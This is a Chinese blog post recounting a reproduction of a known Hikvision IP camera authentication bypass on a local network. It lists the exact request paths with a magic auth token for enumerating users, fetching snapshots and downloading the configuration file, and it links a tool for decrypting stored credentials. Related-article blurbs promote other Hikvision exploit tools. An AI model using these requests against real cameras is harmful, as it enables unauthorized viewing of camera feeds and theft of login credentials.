记录一次Hikvision手日

最新推荐文章于 2024-08-15 14:10:19 发布
最新推荐文章于 2024-08-15 14:10:19 发布
阅读量3.6k 收藏 7
点赞数 1
分类专栏: Penetration 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/122322541
版权

1NDEX

0x00 前言

考试周太Boring了
本来局域网搭个靶场打打
然后扫到了几个摄像头,比较简单,就试试看

本文基本参考freebuf文章编写!!!

贴上参考师傅文章

https://www.freebuf.com/vuls/278336.html

在这里插入图片描述
在这里插入图片描述

0x01 开日

漏洞探测

探测用户列表

/Security/users?auth=YWRtaW46MTEK

在这里插入图片描述

读取快照

onvif-http/snapshot?auth=YWRtaW46MTEK

在这里插入图片描述

下载摄像头配置文件

/System/configurationFile?auth=YWRtaW46MTEK

在这里插入图片描述

配置文件的解密

hikvision的配置文件是加密的。解密工具网上很多要么收费的,要么不靠谱的
git上有好用的
https://github.com/WormChickenWizard/hikvision-decrypter
在这里插入图片描述

读取解密后的配置文件

需要用到wxmedit
下载地址:
https://wxmedit.github.io/zh_CN/downloads.html
根据你一开始读到的用户进行查找
在这里插入图片描述
done
记得登陆后用IE看!

再强调一下 本文参照freebuf上师傅的文章编写!!!
只是拿师傅的方法实操了一下

https://www.freebuf.com/vuls/278336.html

0x02 rethink

伪RT的快乐日常?
脚本小子罢了

k_du1t
关注
专栏目录
海康威视解码专用工具器
06-21
HIKVISION海康威视解码专用工具器
HIKVISION工业相机的SDK二次libview开发实例及说明
08-15
总的来说,HIKVISION工业相机的SDK二次libview开发是一个涉及硬件通信、图像处理、GUI设计和优化等多个领域的复杂过程。通过深入理解SDK提供的工具和接口,结合实例与说明,开发者可以构建出满足特定需求的高效图像...
海康威视CVE-2017-7921漏洞查找与利用
AngrySnack的博客
10-11 2565
海康威视 CVE-2017-7921 漏洞
加密解密、信息安全,密码破解
最新发布
dazer的专栏
08-15 204
DES加密:DES加密是有私钥的,必须要一个私钥,私钥要保存好,并且每次加密的结果都不一样;详见地址博客地址:IOS、java支持DES加密_ios 和java的des加密-CSDN博客。SHA256:明文一定,密码是一定的;如:海康威视登录用的密码就是;MD5加密:明文一定,密码一定是相同的;如,后台的密码-公司项目用的MD5,用md5 加密;123456: 对应的密文是:e10adc3949ba59abbe56e057f20f883e。全球最强的MD5解密网站:md5在线解密破解,md5解密加密。
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 6203
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 6502
海康威视越权访问CVE-2021-7921漏洞复现
Hikvision海康威视数据库账号解密工具
潇湘信安的博客
09-17 1239
这个工具可以用来解密Hikvision海康威视加密的数据库账号和密码,适用版本:海康威视ivms-8700
【护网必备】海康威视RCE批量检测利用工具
Fly_鹏程万里
06-01 1049
海康威视RCE漏洞批量检测和利用工具目前支持任意读取类漏洞一键利用、支持上传类漏洞一键上传哥斯拉shell等、支持配置文件加解密等。2、综合安防管理平台 iSecure Center /api/external/report任意文件上传。3、综合安防管理平台 iSecure Center /center/api/files任意文件上传。1、综合安防管理平台iSecure Center /Im/api/files任意文件读取。5、综合安防管理平台iVMS-8700/upload任意文件上传。
【未授权访问】我就这么容易被曝光了吗?
热门推荐
kimol君的博客
08-06 2万+
【未授权访问】我怎么被监控了?前言一、洞穿一切1.获取用户名2.下载摄像头配置文件3.获取监控快照二、Fofa无边三、双管齐下1.爬取设备信息2.自动化检测写在最后 前言 时光转瞬,上一篇文章的时间定格在了半年前的情人节。由于各种原因,已经好久没有更新文章了,承蒙大家的喜爱,陆续收到了许多小伙伴的“催更”。有一说一:“心里是暖的❤️”。 愿今后自己可以不忘初心,继续前行,将心中的一些想法,一些感受,一些技巧,一些故事与大家分享。 恰巧前不久看到某康威视网络摄像头存在漏洞,于是,作为对万物充满好奇的少年,
hikvision.zip
07-01
标题 "hikvision.zip" 提供的信息表明,这是一个与海康威视(Hikvision)摄像头相关的SDK二次开发项目,其中包含了一个名为 "hikvision" 的基础库和一个 "examples.jar" 文件,该文件是示例代码或库,可能用于演示...
HIKVISION的Delphi二次开发实例
08-15
本主题聚焦于HIKVISION的gigE(千兆以太网)工业相机的Delphi(一种强大的面向对象的编程语言)二次开发实例。这个实例是HIKVISION官方提供的,旨在帮助开发者更好地理解和应用其相机硬件与软件接口。 首先,gigE...
CKF-UKF-EKF.zip_CKF_CKF滤波_ekf、ukf、ckf_卡尔曼 对比_卡尔曼对比
07-15
CKF、EKF、UKF的对比程序,CKF作为09年新出的卡尔曼滤波器,有着严格的数据理论依据。
aes-decrypter
05-28
AES解密器 安装 npm install --save aes-decrypter 也可以全局安装: npm install --global aes-decrypter 首选npm安装,但是Bower也可以。 bower install --save aes-decrypter 用法 要将解密程序包含在您的网站或npm应用程序中,请使用以下任何一种方法。 var Decrypter = require ( 'aes-decrypter' ) . Decrypter ; var fs = require ( 'fs' ) ; var keyContent = fs . readFileSync ( 'something.key' ) ; var encryptedBytes = fs . readFileSync ( 'somithing.txt' ) ; // keyCo
hikvision-onvif2.4.7z
05-30
hikvision-onvif2.4.7z 海康 onvif接口说明文档,刚从官网下载下来。时间 hikvision-onvif2.4.7z
CC2530PSHT11.rar_CC2530 SHt11_cc2530 sht
07-15
CC2530驱动SHT11,试验成功 环境IAR
HIKVISION控制命令文档
08-24
- **模式设置和记录控制**:包括启动和停止特定模式的命令,如“记录开始”、“记录停止”以及“模式开始”、“模式停止”等。这些模式可以是根据预设的序列或轨迹进行操作。 ### 知识点四:PTZ服务安全性和配置 -...
Hikvision 2-Preview-NVRCsharpDemo_Hikvision_nvr_DEMO_
09-30
标题中的“Hikvision 2-Preview-NVRCsharpDemo_Hikvision_nvr_DEMO_”指的是海康威视(Hikvision)开发的一个基于C#的NVR(网络视频录像机)预览演示程序。这个程序主要是为了让开发者或者用户了解如何通过C#语言与...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值